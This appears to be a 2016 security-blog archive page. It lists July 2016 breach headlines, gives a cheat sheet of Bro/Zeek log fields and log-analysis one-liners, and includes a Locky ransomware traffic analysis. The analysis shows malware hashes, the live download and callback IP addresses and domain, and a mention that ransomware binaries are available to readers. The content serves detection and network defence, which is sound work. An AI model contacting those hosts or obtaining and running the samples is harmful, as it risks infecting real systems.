Monthly Archives: July 2016

List of data breaches and cyber attacks in July 2016 35,400,000 known records stolen

Another month is coming to a close, and once again it ends with a long list of data breaches and cyber attacks – a list that gets longer every month.

Two breaches that stand out to me are the Wendy’s and Cici’s Pizza data breaches, in which point-of-sale (POS) malware swiped a significant amount of card details. POS malware is increasingly becoming an issue for retailers – there are many variations and many ways for the malware to be installed. There haven’t been any official numbers to show how many cards were affected in both breaches, but more than 1000 Wendy’s and 135 Cici’s locations were affected.

Data breach

StarCare Specialty Health System notifies patients after burglar snatches laptop, paper files

O2 customer data sold on dark net

King’s counselling department breaches students’ privacy

Athens Orthopedic Clinic to begin notifying patients of hack

WikiLeaks Put Women in Turkey in Danger, for No Reason

10 million customer’s data leaked from online shopping site

‘Warframe’ Hacked, Details on 775,000 Players Traded

Illinois online voter registration portal hacked, information compromised

Wolverhampton council in huge data leak blunder

Wikileaks posts nearly 20,000 hacked DNC emails online

Glassdoor goof exposes thousands of user email addresses

Sunbury Plaza Dental notifies patients after stored records were burglarized

Hacker steals 1.6 million accounts from top mobile game’s forum

WeWork battling another data leak

Denmark sent sensitive health data to Chinese by mistake

Beggars Group Hacked, Warns Customers of Data Breach

Saint John Development Corporation finds cyber attack damage

Confidential Info of 388 HIV Patients Feared Leaked in China

Asiana Airlines Website Has Customers’ Personal Data Leak

Notice of Ubuntu Forums breach; user passwords not compromised

Alabama website breach revealed personal data of some state retirees

Leaky database leaves Oklahoma police, bank vulnerable to intruders

Stolen laptop puts Pa. taxpayers’ data at risk

Hospital Hackers Steal Thousands of Newborn Baby Videos

Datadog chews on data breach, AWS user credentials in leak

Ukrainian Hacker Hacks Polish Telecom Giant Netia; Leaks Massive Data

Hackers Allegedly Steal 1.4M Passwords From Mac Forums, Web Hosting Talk

Internet Bot Exposes 20 Million MTN Irancell Users’ Data

Cyber attack

Hackers target Hunting & Fishing NZ

Pink Hill pastor says computer hacked, churchgoer information almost compromised

US Congress websites recovering after three-day DDoS attack

Steemit experienced hack, theft of user funds, and DDoS attack

LizardStresser recruits an army of zombie webcams to launch DDoS attacks

Internet in Mumbai Goes Slow As ISPs Suffer Massive DDoS Attacks

HSBC Website Suffers DDoS Attack

Financial

DID Electrical says more than 300 people have card details stolen after online security breach

Cici’s Pizza suffers payment card data breach

Omni Hotels & Resorts data breach affects 50,000 credit and debit cards

Over 1000 Wendy’s restaurants hacked – customers’ credit card details stolen

Other

O2 customer data sold on dark net

Lasair Aesthetic Health notifying patients after manager took information after resigning

Kaiser Permanente notifies patients after stolen ultrasound machines were recovered

Playstation chief Shuhei Yoshida has his Twitter hacked by OurMine

Fighting back against cyber crime

Hongkonger who launched over 6,000 web attacks during Occupy movement gets 15 months probation

UK Security Firm Execs Admit to Hacking Rival Company

Fired after NFL player’s medical chart leaked to ESPN, worker sues

Loan Company Employee Sentenced for Stolen Identity Tax Fraud

Baseball Hacking Case Ends with Prison

Share Button

Cyber Security CyberSecurity Attack Pie Graph SQL Inection / XSS leading the way – DDoS attacks swept under the rug

Cyber Security Attack Pie Graph – you can see SQLi is still #1 however most XSS attacks are never even realized, additionally DDoS attacks might actually be the most common attack worldwide but many attacks are short burst that go unnoticed. Other DDoS attacks go unreported out of fear that it will hurt their brand and reputation.

 

WHID_top_web_hacking_methods

Share Button

Bro Logs Protocol Log Features Fields Description Cheat Sheet How To

b1 b2 b3 b4 b5 b6 b7 b8 b9 b10 b11 b12 b13 b14 b15 b16 b17 b18 b19 b22 b23 b25 b27 b29 b33 b34 b55

State Meaning
S0 Connection attempt seen, no reply
S1 Connection established, not terminated (0 byte counts)
SF Normal establish & termination (>0 byte counts)
REJ Connection attempt rejected
S2 Established, ORIG attempts close, no reply from RESP.
S3 Established, RESP attempts close, no reply from ORIG.
RSTO Established, ORIG aborted (RST)
RSTR Established, RESP aborted (RST)
RSTOS
0
ORIG sent SYN then RST; no RESP SYN-ACK
RSTRH RESP sent SYN-ACK then RST; no ORIG SYN
SH ORIG sent SYN then FIN; no RESP SYN-ACK (“half-open”)
SHR RESP sent SYN-ACK then FIN; no ORIG SYN
OTH No SYN, not closed. Midstream traffic. Partial
connection.
conn.log: conn_state
Field Type Description
ts time Measurement timestamp
ts_delta interval Time difference from previous measurement
peer string Name of the Bro instance reporting loss
gaps count ACKs seen without seeing data being ACKed
acks count Total number of TCP ACKs
percent_loss string gaps/acks, as a percentage. Estimate of loss.
capture_loss.log
Estimate of packet loss
Field Type Description
ts time Timestamp of the DNS request
uid string Unique id of the connection
id recor
d
ID record with orig/resp host/port. See conn.log
proto proto Protocol of DNS transaction – TCP or UDP
trans_id count 16 bit identifier assigned by DNS client; responses match
query string Domain name subject of the query
qclass count Value specifying the query class
qclass_name string Descriptive name of the query class (e.g. C_INTERNET)
qtype count Value specifying the query type
qtype_name string Name of the query type (e.g. A, AAAA, PTR)
rcode count Response code value in the DNS response
rcode_name string Descriptive name of the response code (e.g. NOERROR, NXDOMAIN)
QR bool Was this a query or a response? T = response, F = query
AA bool Authoritative Answer. T = server is authoritative for query
TC bool Truncation. T = message was truncated
RD bool Recursion Desired. T = request recursive lookup of query
RA bool Recursion Available. T = server supports recursive queries
Z count Reserved field, should be zero in all queries & responses
answers vector List of resource descriptions in answer to the query
TTLs vector Caching intervals of the answers
rejected bool Whether the DNS query was rejected by the server
dns.log
DNS query/response details
Field Type Description
ts time Timestamp
uid string Unique ID of Connection
id.orig_h addr Originating endpoint’s IP address (AKA ORIG)
id.orig_p port Originating endpoint’s TCP/UDP port (or ICMP code)
id.resp_h addr Responding endpoint’s IP address (AKA RESP)
id.resp_p port Responding endpoint’s TCP/UDP port (or ICMP code)
proto transport
_proto
Transport layer protocol of connection
service string Dynamically detected application protocol, if any
duration interval Time of last packet seen – time of first packet seen
orig_bytes count Originator payload bytes; from sequence numbers if TCP
resp_bytes count Responder payload bytes; from sequence numbers if TCP
conn_state string Connection state (see conn.log:conn_state table)
local_orig bool If conn originated locally T; if remotely F.
If Site::local_nets empty, always unset.
missed_bytes count Number of missing bytes in content gaps
history string Connection state history (see conn.log:history table)
orig_pkts count Number of ORIG packets
orig_ip_bytes count Number of ORIG IP bytes (via IP total_length header field)
resp_pkts count Number of RESP packets
resp_ip_bytes count Number of RESP IP bytes (via IP total_length header field)
tunnel_parents set If tunneled, connection UID of encapsulating parent (s)
orig_cc string ORIG GeoIP Country Code
resp_cc string RESP GeoIP Country Code
conn.log
IP, TCP, UDP and ICMP connection details
Letter Meaning
S a SYN without the ACK bit set
H a SYN-ACK (“handshake”)
A a pure ACK
D packet with payload (“data”)
F packet with FIN bit set
R packet with RST bit set
C packet with a bad checksum
I Inconsistent packet (Both SYN & RST)
conn.log: history
Orig UPPERCASE, Resp lowercase, uniq-ed
Bro Logs
Field Type Description
ts time Timestamp of request
uid string Connection unique id
id record ID record with orig/resp host/port. See conn.log
mac string Client’s hardware address
assigned_ip addr Client’s actual assigned IP address
lease_time interval IP address lease time
trans_id count Identifier assigned by the client; responses match
dhcp.log
DHCP lease activity
app_stats.log
Statistics on usage of popular web apps
Field Type Description
ts time Measurement timestamp
ts_delta interval Time difference from previous measurement
app string Name of application (YouTube, Netflix, etc.)
uniq_hosts count Number of unique hosts that used app
hits count Number of visits to app
bytes count Total bytes transferred to/from app

Field
Type
Description
ts
time
Timestamp when file was first seen
fuid
string
identifier for a single file
tx_hosts
set
if transferred via network, host(s) that sourced the data
rx_hosts
set
if transferred via network, host(s) that received the data
conn_uids
set
Connection UID(s) over which the file was transferred
source
string
An identification of the source of the file data
depth
count
Depth of file related to source; eg: SMTP MIME attachment depth; HTTP depth of the request
analyzers
set
Set of analysis types done during file analysis
mime_type
string
Libmagic sniffed file type
filename
string
If available, filename from source; frequently the “Content-Disposition” headers in network protocols
duration
interval
The duration the file was analyzed for
local_orig
bool
If transferred via network, did data originate locally?
is_orig
bool
If transferred via network, was file sent by the originator?
seen_bytes
count
Number of bytes provided to file analysis engine
total_bytes
count
Total number of bytes that should comprise the file
missing_bytes
count
Number of bytes in the file stream missed; eg: dropped packets
overflow_bytes
count
Number of not all-in-sequence bytes in the file stream delivered to file analyzers due to reassembly buffer overflow
timedout
bool
If the file analysis time out at least once per file
parent_fuid
string
ID associated with a container file from which this one was extracted as a part of the analysis
md5/sha1/sha256
string
MD5/SHA1/SHA256 hash of file, if enabled
extracted
string
Local filename of extracted files, if enabled
files.log
File analysis results
Field
Type
Description
ts
time
Timestamp
uid
interval
Connection unique id
id
string
ID record with orig/resp host/port. See conn.log
fc_request
string
The name of the request function message
fc_reply
string
The name of the reply function message
iin
count
Response’s “internal indication number”
dnp3.log
Distributed Network Protocol (industrial control)
Field
Type
Description
ts
time
Timestamp
uid
string
Unique id
id
record
ID record with orig/resp host/port. See conn.log
nick
string
Nickname given for this connection
user
string
Username given for this connection
command
string
Command given by the client
value
string
Value for the command given by the client
addl
string
Any additional data for the command
dcc_file_name
string
DCC filename requested
dcc_file_size
count
Size of the DCC transfer as indicated by the sender
dcc_mime_type
string
Sniffed mime type of the file
fuid
string
File unique ID
irc.log
IRC communication details
Field
Type
Description
ts
time
Command timestamp
uid
string
Connection unique id
id
record
ID record with orig/resp host/port. See conn.log
user
string
Username for current FTP session
password
string
Password for current FTP session
command
string
Command issued by the client
arg
string
Command argument if present
mime_type
string
Libmagic sniffed file type if there’s a file transfer
file_size
count
Size of transferred file
reply_code
count
Reply code from server in response to the command
reply_msg
string
Reply message from server in response to the command
data_channel
record
Information about the data channel (orig, resp, is passive)
fuid
string
File unique ID
ftp.log
FTP request/reply details
Field
Type
Description
ts
time
Timestamp of hit
uid
string
Connection unique id
id
record
ID record with orig/resp host/port. See conn.log
fuid
string
The UID for a file associated with this hit, if any
file_mime_type
string
A mime type if the hit is related to a file
file_desc
string
Additional context for file, if available
seen.indicator
string
The intelligence indicator
seen.indicator_type
string
The type of data the indicator represents
seen.where
string
Where the data was discovered
sources
set
Sources which supplied data for this match
intel.log
Hits on indicators from the intel framework
Field
Type
Description
ts
time
Timestamp of request
uid
string
Connection unique id
id
record
ID record with orig/resp host/port. See conn.log
trans_depth
count
Pipelined depth into the connection
method
string
HTTP Request verb: GET, POST, HEAD, etc.
host
string
Value of the HOST header
uri
string
URI used in the request
referrer
string
Value of the “referer” header
user_agent
string
Value of the User-Agent header
request_
body_len
count
Actual uncompressed content size of the data transferred from the client
response_
body_len
count
Actual uncompressed content size of the data transferred from the server
status_code
count
Status code returned by the server
status_msg
string
Status message returned by the server
info_code
count
Last seen 1xx info reply code by server
info_msg
string
Last seen 1xx info reply message by server
filename
string
Via the Content-Disposition server header
tags
set
Indicators of various attributes discovered
username
string
If basic-auth is performed for the request
password
string
If basic-auth is performed for the request
proxied
set
Headers that might indicate a proxied request
orig_fuids
vector
An ordered vector of file unique IDs from orig
orig_mime_types
vector
An ordered vector of mime types from orig
resp_fuids
vector
An ordered vector of file unique IDs from resp
resp_mime_types
vector
An ordered vector of mime types from resp
http.log
request/reply details
Bro Logs

Field
Type
Description
ts
time
Timestamp first seen
host
addr
IP Address of host
known_hosts.log
Observed local active IPs; logged 1xDay
Field
Type
Description
ts
time
Timestamp
host
addr
Host address on which the service is running
port_num
port
Port number on which the service is running
port_proto
transport
_proto
Transport-layer protocol service uses
service
set
Set of protocol(s) that match the service’s connection payloads
known_services.log
Observed local services; logged 1xDay
Field
Type
Description
ts
time
Timestamp
uid
string
Connection unique id
id
record
ID record with orig/resp host/port. See conn.log
fuid
string
File unique identifier
file_mime_type
string
Libmagic sniffed file type
file_desc
string
Additional context for file, if available
proto
transport_proto
Transport protocol
note
string
The type of the notice
msg
string
Human readable message for the notice
sub
string
Sub-message for the notice
src
addr
Source address
dst
addr
Destination address
p
port
Associated port, if any
n
count
Associated count or status code
peer_descr
string
Description for peer that raised this notice
actions
set
Actions applied to this notice
suppress_for
interval
Length of time dupes should be suppressed
dropped
bool
If the src IP was blocked
notice.log
Logged notices
Bro Logs
Field
Type
Description
ts
time
Measurement timestamp
host
addr
Address that offered the certificate
port_num
port
If server, port that server listening on
subject
string
Certificate subject
issuer_subject
string
Certificate issuer subject
serial
string
Serial number for the certificate
known_certs.log
Observed local Certs; logged 1xDay
Field
Type
Description
ts
time
Timestamp when the message was first seen
uid
string
Connection unique id
id
record
ID record with orig/resp host/port. See conn.log
trans_depth
count
Depth of message transaction if multiple messages transferred
helo
string
Contents of the HELO header
mailfrom
string
Contents of the MAIL FROM header
rcptto
set
Contents of the RCPT TO header
date
string
Contents of the DATE header
from
string
Contents of the FROM header
to
set
Contents of the TO header
reply_to
string
Contents of the ReplyTo header
msg_id
string
Contents of the MsgID header
in_reply_to
string
Contents of the In-Reply-To header
subject
string
Contents of the Subject header
x_originating_ip
addr
Contents of the X-Originating-IP header
first_received
string
Contents of the first Received header
second_received
string
Contents of the second Received header
last_reply
string
Last message that the server sent to the client
path
vector
Message transmission path, extracted from the headers
user_agent
string
Value of the User-Agent header from the client
tls
bool
Connection has switched to using TLS
fuids
vector
File unique IDs seen attached to this message
is_webmail
bool
Indicates if the message was sent through a webmail interface
smtp.log
SMTP transactions
Field
Type
Description
ts
time
Timestamp of request
uid
string
Connection unique id
id
record
ID record with orig/resp host/port. See conn.log
func
string
Function message that was sent
exception
string
Exception if there was a failure
modbus.log
PLC requests (industrial control)
Field
Type
Description
ts
time
Message timestamp
level
string
Message severity (Info, warning, error, etc.)
message
string
Message text
location
string
The script location where tevent occurred, if available
reporter.log
Bro internal errors and warnings
Version: 2.3
3
www.CriticalStack.com
Field
Type
Description
ts
time
Timestamp of the detection
uid
string
Unique ID for the connection
id
conn_id
ID record with orig/resp host/port. See conn.log
username
string
The username, if present
mac
string
MAC address, if present
remote_ip
addr
Remtoe IP address, if present
connect_info
string
Connect info, if present
result
string
Successful or failed authentication
logged
bool
Whether this has already been logged & ignored
radius.log
Radius authentication details

Field
Type
Description
ts
time
Timestamp when the SSL connection was detected
uid
string
Connection unique id
id
record
ID record with orig/resp host/port. See conn.log
version
string
SSL version that the server offered
cipher
string
SSL cipher suite that the server chose
server_name
string
Value of the Server Name Indicator SSL extension
session_id
string
Session ID offered by the client for session resumption
subject
string
Subject of the X.509 cert offered by the server
issuer_subject
string
Signer Subject of the cert offered by the server
not_valid_before
time
NotValidBefore field value from the server cert
not_valid_after
time
NotValidAfter field value from the server cert
last_alert
string
Last alert that was seen during the connection
client_subject
string
Subject of the X.509 cert offered by the client
clnt_issuer_subject
string
Subject of the signer of the cert offered by the client
cert_hash
string
MD5 hash of the raw server certificate
validation_status
vector
Certificate validation for this connection
ssl.log
SSL handshakes (v2.2 only; v2.3 x509.log)
Bro Logs
Version: 2.3
Field
Type
Description
ts
time
Timestamp when the SSH connection was detected
uid
string
Connection unique ID
id
record
ID record with orig/resp host/port. See conn.log
status
string
If the login was heuristically guessed to be a “success” or a “failure”.
direction
string
Outbound or inbound connection
client
string
Software string from the client
server
string
Software string from the server
resp_size
count
Amount of data returned by the server
ssh.log
SSH handshakes

Field
Type
Description
ts
time
Timestamp of request
uid
string
Connection unique id
id
record
ID record with orig/resp host/port. See conn.log
version
count
Protocol version of SOCKS
user
string
Username for proxy, if available
status
string
Server status for the attempt using proxy
request.host
addr
Client requested address
request.name
string
Client requested name
request_p
port
Client requested port
bound.host
addr
Server bound address
bound.name
string
Server bound name
bound_p
port
Server bound port
socks.log
SOCKS proxy requests
Field
Type
Description
ts
time
Timestamp of the detection
host
addr
IP address running the software
host_p
port
Port on which the software is running (for servers)
software_type
string
Type of software (e.g. HTTP::SERVER)
name
string
Name of the software
version.major
count
Major version number of the software
version.minor
count
Minor version number of the software
version.minor2
count
Minor subversion number of the software
version.minor3
count
Minor update number of the software
version.addl
string
Additional version string (e.g. beta42)
unparsed_version
string
The full, unparsed version of the software
software.log
Software identified by the software framework
Field
Type
Description
ts
time
Timestamp of match
src_addr
addr
Host triggering the signature match event
src_port
port
Host port on which the match occurred
dst_addr
addr
Host which was sent the matching payload
dst_port
port
Port which was sent the matching payload
note
string
Notice associated with the signature event
sig_id
string
Name of the signature that matched
event_msg
string
More descriptive message of the event
sub_msg
string
Extracted payload data or extra message
sig_count
count
Number of sigs
host_count
count
Number of hosts
signatures.log
Matches from the signature framework
Field
Type
Description
ts
time
Timestamp tunnel was detected
uid
string
Connection unique id
id
conn_id
ID record with orig/resp host/port. See conn.log
duration
interval
Amount of time between first/latest packet in session
version
string
The version of SNMP being used
community
string
Community string of the first SNMP packet associated w/ session; v1 & v2c only
get_requests
count
Number of variable bindings in GetRequest/Next
get_bulk_requests
count
Number of variable bindings in GetBulkRequest PDU
get_responses
count
Number of variable bindings in GetResponse/Response PDUs
set_requests
count
Number of variable bindings in SetRequest PDUs
display_string
string
System description of the SNMP responder endpoint
up_since
time
Time the SNMP responder claims it has been up since
snmp.log
SNMP communication
Description
Error / output logging – LogAscii::output_to_stdout = F &redef
stderr.log / stdout.log
Field
Type
Description
ts
time
Timestamp when the message was seen
uid
string
Connection unique id
id
record
ID record with orig/resp host/port. See conn.log
proto
transport_proto
Protocol over which message was seen. Only UDP is currently supported.
facility
string
Syslog facility for the message
severity
string
Syslog severity for the message
message
string
The plain text syslog message
syslog.log
Syslog messages

Page
Description
app_stats
1
Statistics on usage of popular web apps
capture_loss
1
Estimate of packet loss
cluster
Diagnostics for cluster operation
communication
Diagnostics for inter-process communications
conn
1
IP, TCP, UDP and ICMP connection details
dhcp
1
DHCP lease activity
dnp3
2
Distributed Network Protocol (industrial control)
dpd
Diagnostics for dynamic protocol detection
files
2
File analysis results
intel
2
Hits on indicators from the intel framework
irc
2
IRC communication details
known_certs
3
Observed local SSL certs. Each is logged once/day
known_devices
Observed local devices. Each is logged once/day
known_hosts
3
Observed local active IPs. Each is logged once/day
known_services
3
Observed local services. Each is logged once/day
loaded_scripts
A list of scripts that were loaded at startup
modbus
3
PLC requests (industrial control)
notice
3
Logged notices
packet_filter
Any filters to limit the traffic being analyzed
radius
3
radius authentication details
reporter
3
Internal errors and warnings
signatures
4
Matches from the signatures framework
socks
4
SOCKS proxy requests
software
4
Software identified by the software framework
ssh
4
SSH handshakes
ssl
4
SSL handshakes (v2.2 only; v2.3 x509.log)
stats
Diagnostics such as mem usage, packets seen, etc.
stderr / stdout
4
Output logging
traceroute
5
Hosts running traceroute
tunnel
5
Details of encapsulating tunnels
x509
5
x509 Certificate Analyzer Output
weird
5
Anomalies and protocol violations
Index
Field
Type
Description
ts
time
Timestamp of the detection
id
String
File id of this certificate
certificate .
record
Certificate details
.version
count
Version number
.serial
string
Serial number
.issuer
string
Certificate issuer
.not_valid_before
time
Timestamp before when certificate is not valid
.not_valid_after
time
Timestamp after when certificate is not valid
.key_alg
string
Name of the key algorithm
.sig_alg
string
Name of the signature algorithm
.key_type
string
Key type, if key parseable openssl (rsa, dsa or ec)
.key_length
count
Key length in bits
.exponent
string
Exponent, if RSA-certificate
.curve
string
Curve, if EC-certificate
san.
record
Subject Alternative Name
.dns
string_vec
List of DNS entries in the SAN
.uri
string_vec
List of URI entries in the SAN
.email
string_vec
List of email entries in the SAN
.ip
addr_vec
List of IP entries in the SAN
.other_fields
bool
True if certificate contained other, unrecognized fields
basicconstraints.
record
Basic constraints extension of the certificate
.ca
bool
CA fla set?
.path_len
count
Maximum path length
logcert
bool
T (present if policy/protocols/ssl/log-hostcerts-only.bro)
x509.log
x509 Certificate Analyzer Output
Field
Type
Description
ts
time
Timestamp of message
uid
string
Connection unique id
id
record
ID record with orig/resp host/port. See conn.log
name
string
The name of the weird that occurred
addl
string
Additional information accompanying the weird, if any
notice
bool
Indicate if this weird was also turned into a notice
peer
string
The peer that generated this weird
weird.log
Anomalies and protocol violations
Field
Type
Description
ts
time
Timestamp traceroute was detected
src
addr
Address initiating the traceroute
dst
addr
Destination address of the traceroute
proto
string
Protocol used for the traceroute
traceroute.log
Hosts running traceroute
Field
Type
Description
ts
time
Timestamp tunnel was detected
uid
string
Connection unique id
id
record
ID record with orig/resp host/port. See conn.log
tunnel_type
string
The type of tunnel (e.g. Teredo, IP)
action
string
The activity that occurred (discovered, closed)
tunnel.log
Details of encapsulating tunnels
Bro Logs

Field
bro -C -r file.pcap local extract-all-files.bro “Site::local_nets += {10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16}”
Hey bro, ignore checksums and then read in file.pcap using the current local.bro and also load extract-all-files.bro ADDING the following subnets to your list of local_nets.
less conn.log | bro-cut -d | awk ‘{split($0, a, “\t”); if (a[5] == “10.2.2.2”) print $0}’
First print out the conn.log and send the output to bro-cut; bro-cut replace the unix epoch time column with a human readable date (-d) and send the output to awk; awk, chop up that string at each tab and put each column into an array a; if the fifth element, a[5] is “10.2.2.2” please print the whole log line.
bro -C -r http-partial-content-transfer.pcap policy/misc/dump-events.bro “PacketFilter::default_capture_filter = \”host 54.230.103.187\”” >> dump-events-host.log
Hey bro, read in this pcap and also load dump-events.bro, running with a BPF so you only look at traffic with this host and then append the output into this file.
cat conn.log |bro-cut id.orig_h id.resp_h orig_bytes resp_bytes missed_bytes | awk ‘$5 > 10000’
Let’s look for connections with high packet loss.
bro one liners

Linux Commands
Command
Description
cd logs
Move to the logs directory, which is located in the current directory.
cd /logs
Move to the logs directory, which is located in the top-level directory.
cd ..
Move up one directory.
cd ~
Move to your home directory (“tilde” is to the left of the 1 key).
cd –
Move to the directory you were previously in.
Getting Around
Command
Description
cat conn.log
Display data.txt
cat *.log
Display all files that end in .log
head conn.log
Display the first 10 lines of conn.log
head –n 20 conn.log
Display the first 20 lines of conn.log
tail conn.log
Display the last 10 lines of conn.log
tail –n 30 conn.log
Display the last 30 lines of conn.log
tail –F conn.log
Display last 10 lines & continue new lines
Note: Ctrl + C to exit
grep SSL notice.log
Display lines in notice.log that contain SSL
grep –v SSL notice.log
Display lines in notice.log with out SSL
grep ‘mal ware’ data.txt
Search item w/ spaces using single quotes.
grep –F 1.2.3.4
Search for phrases with periods
grep –c dosexec files.log
How many lines in files.log contain dosexec
less conn.log
Display conn.log in less (see right)
less –S conn.log
Display with side-to-side scrolling
Viewing and searching files
Command
Description
q
Quit
up/down arrow
Move up/down one line
left/right arrow
Move left/right ½ page; requires less -S
page up/down
Move up/down one page
g
Go to the first line
G
Go to the last line
F
Go to the last line; display any new lines. Ctrl-C to exit
/SSL
Search- go to the next line containing ‘SSL’
/!SSL
Search- go to the next line NOT containing ‘SSL’
?malware
Search- go to the previous line containing ‘SSL’
n
Repeat a previous search
N
Repeat a previous search in the opposite direction
Navigating in less
Command
Description
| aka “pipe”
Pass the output of one command to another command.
grep SSL notice.log | tail –n 30
Display the last 30 lines in notice.log that contain “SSL”.
grep SSL notice.log | grep –i google
Display lines in notice.log containing SSL and google in any case (upper/lower mix).
cat data.txt | sort
Display data.txt, sorted alphabetically.
cat data.txt | sort | uniq
Display data.txt, sorted alphabetically, with duplicates removed.
cat data.txt | sort | uniq –c
Display data.txt, sorted alphabetically, with duplicates removed and a count of each occurrence.
cat data.txt | sort | uniq –c | sort –n
Display, sort, count of distinct, ordered from least to most
cat notice.log | bro-cut note | sort | uniq –c | sort –n
What are the most popular notices?
cat http.log | bro-cut –d ts method host uri
Only display timestamp, method, host and URI and convert timestamp to human readable.
Putting it all together
Command
Description
git clone [url]
Downloads a project and the entire version history
git status
Lists all new or modified files to be committed
git diff
Shows file differences not yet staged
git add [file]
Snapshots the file in preparation for versioning
git diff –staged
Shows file differences between staging & last version.
git reset [file]
Unstages the file and preserves contents
git commit
Records snapshot; add –m “msg” for comment
git branch
Show all branches in current repo; -a for all branches
git branch [name]
Create a new branch
git checkout [branch]
Switches to the specified branch & updates the working directory.
git merge [branch]
Comines the specified branch’s history into the current branch.
git commands
Command
Description

Share Button

BRO vs Snort IDS Locky Ransomware tcpdump Traffic Sample Data Packet Analysis

(PCAP and Binary samples available with their usual password and location)

Bro and Snort are completely different types of applications although they are commonly compared against one another. From a network security standpoint Snort can’t do much to detect new malware variants, obfuscation TTPs and other non-low hanging fruit we haven’t created a signature for.

Bro gives us the ability to detect malware as close to 0day as we could hope for with a few simple tricks. Once you have enabled all Bro logging options you will have SHA1 and MD5 hashes for files and certificates that are traversing your network. Bro by itself is nothing more than a logging interface, it can easily be turned into an IDS. Anti-Virus software depends upon signatures, heuristics and patterns that have been fed to it for detection, this type of detection is far from real time but for most of us it is as good as it gets.

When I submitted the Locky ransomware sample here “https://www.virustotal.com/en/file/84505a6be0fdca95e71003afcab8df228065f687436f0271d2a27f6dc7479fc5/analysis/” for scan it had a detection rate of 4/50 (by now most of the AV suites are detecting it) with only Trend Micro AV actually detecting it as Locky. We can use Bro as an enhanced anti-virus suite by leveraging all of the major software providers intel at once. File samples are submitted all over the Internet at different rates and to different vendors with almost all having rss feeds and Google search console updates almost instantly. If we create a simple python script to cURL all of the major vendors feeds and index the file hashes and indicators of compromise we can essentially leverage the collective knowledge of all of the major vendors without a paid subscription to any. Create a cronjob to perform a search for the latest entries every 5,10,30,60 minutes or whatever suites your client’s or site’s needs and match them to hashes, IPs and domain names traversing your network.

Here are sample Bro logs of the Locky malware:

https://www.virustotal.com/en/file/84505a6be0fdca95e71003afcab8df228065f687436f0271d2a27f6dc7479fc5/analysis/
SHA256:    84505a6be0fdca95e71003afcab8df228065f687436f0271d2a27f6dc7479fc5

root@computersecurity:/var/log/bro/2016-06-28# zcat files.17\:00\:00-18\:00\:00.log.gz | grep application/x-dos
1467148303.427135       FEQjwH1zOtgq0XUwd       217.74.66.167   192.168.1.100 ChxVZM3W6tGn0jM9ad      HTTP    0       PE,SHA1,MD5     application/x-dosexec   –       1.334915        F       F       269106  269106  0       0       F bef0781693c41bcda3000c8f5ca40e3e 869ba5e59470baac4ef0462b8c9923ac70197b05

https://malwr.com/analysis/NTIwNjc0Zjc1NWJlNDUwOTg5NTA2OWQ3ZTZkZmFkZWQ/
–       –
1467148303.428111       F3ZsZV32sDWqH6jLFj      217.74.66.167   192.168.1.100   CDKmDc28png4js7QY1      HTTP    0       PE,SHA1,MD5     application/x-dosexec   –       1.338627        F       F       269106  269106  0       0       F bef0781693c41bcda3000c8f5ca40e3e 869ba5e59470baac4ef0462b8c9923ac70197b05        –       –

https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj~Agent-ASMW/detailed-analysis.aspx#

root@computersecurity:/var/log/bro/2016-06-28# zcat http.17\:00\:00-18\:00\:00.log.gz | grep 217.74.66.167
1467148303.427135       ChxVZM3W6tGn0jM9ad      192.168.1.100  39868   217.74.66.167   80      1       –       –       –       –       –       0       269106  200     OK      –       –       –       (empty) –       –       –       – FEQjwH1zOtgq0XUwd        application/x-dosexec
1467148303.428111       CDKmDc28png4js7QY1      192.168.1.100   39868   217.74.66.167   80      1       –       –       –       –       –       0       269106  200     OK      –       –       –       (empty) –       –       –       – F3ZsZV32sDWqH6jLFj       application/x-dosexec

root@computersecurity:/var/log/bro/2016-06-28# zcat pe.17\:00\:00-18\:00\:00.log.gz
#separator \x09
#set_separator  ,
#empty_field    (empty)
#unset_field    –
#path   pe
#open   2016-06-28-17-11-45
#fields ts      id      machine compile_ts      os      subsystem       is_exe  is_64bit        uses_aslr       uses_dep        uses_code_integrity     uses_seh        has_import_table        has_export_table        has_cert_table  has_debug_data     section_names
#types  time    string  string  time    string  string  bool    bool    bool    bool    bool    bool    bool    bool    bool    bool    vector[string]
1467148303.427546       FEQjwH1zOtgq0XUwd       I386    1467118146.000000       Windows XP      WINDOWS_GUI     T       F       T       F       F       T       T       F       F       T       .text,.rdata,.data,.rsrc,.reloc
1467148303.429271       F3ZsZV32sDWqH6jLFj      I386    1467118146.000000       Windows XP      WINDOWS_GUI     T       F       T       F       F       T       T       F       F       T       .text,.rdata,.data,.rsrc,.reloc
#close  2016-06-28-18-00-00

root@computersecurity:/var/log/bro/2016-06-28# zcat dns.17\:00\:00-18\:00\:00.log.gz | grep 217.74
1467148303.153851       CAGAOC2ltPBR0uP1fj      192.168.1.100   48407   75.75.75.75     53      udp     6278    ratownictwo.strefa.pl   –       –       –       –       0       NOERROR F       F       F       T       0       217.74.66.167      600.000000      F
1467148303.153406       CC6Pi1y2ccItuEWSd       192.168.1.100 53627   75.75.75.75     53      udp     6278    ratownictwo.strefa.pl   –       –       –       –       0       NOERROR F       F       F       T       0       217.74.66.167      600.000000      F

Callback Traffic:

root@computersecurity:/var/log/bro/2016-06-28# zcat conn.18\:00\:00-19\:00\:00.log.gz | grep 151.236.15.226
1467152337.859581 CdsNLi2wzTqFogbC75 192.168.1.100 57436 151.236.15.226 80 tcp http 4.752286 5249 0 S0 T F 0 SAD 14 5821 0 0 (empty)
1467152337.963955 Cib4i04qmEJujDylCf 192.168.1.100 57436 151.236.15.226 80 tcp – 284.882985 0 12631 SHR T F 0 hadf 0 0 28 13763 (empty)
1467152357.463053 CPlEdm3dmsVSNedE32 192.168.1.100 57436 151.236.15.226 80 tcp – 265.384630 3913 0 OTH T F 0 DA 10 4313 0 0 (empty)
1467153134.228094 Cpm6U13YlnzxKjNtmh 192.168.1.100 57436 151.236.15.226 80 tcp – – – – SH T F 0 F 1 40 0 0 (empty)
1467153134.328506 Cp7e6NpP3PwGqcmZb 192.168.1.100 57436 151.236.15.226 80 tcp – – – – RSTRH T F 0 r 0 0 1 40 (empty)
1467153638.321168 CL8b5C1mJEASLDOHA2 192.168.1.100 58128 151.236.15.226 80 tcp http 2.884468 3615 0 S0 T F 0 SAD 12 4107 0 0 (empty)
1467153643.383005 CT8caj2DDA5gKnacu1 192.168.1.100 58128 151.236.15.226 80 tcp – 82.386675 9170 0 SH T F 0 DAF 20 9970 0 0 (empty)
1467153638.425665 Cyb5P42KRdZGCumUk3 192.168.1.100 58128 151.236.15.226 80 tcp – 87.343249 0 12321 SHR T F 0 hadf 0 0 35 13733 (empty)

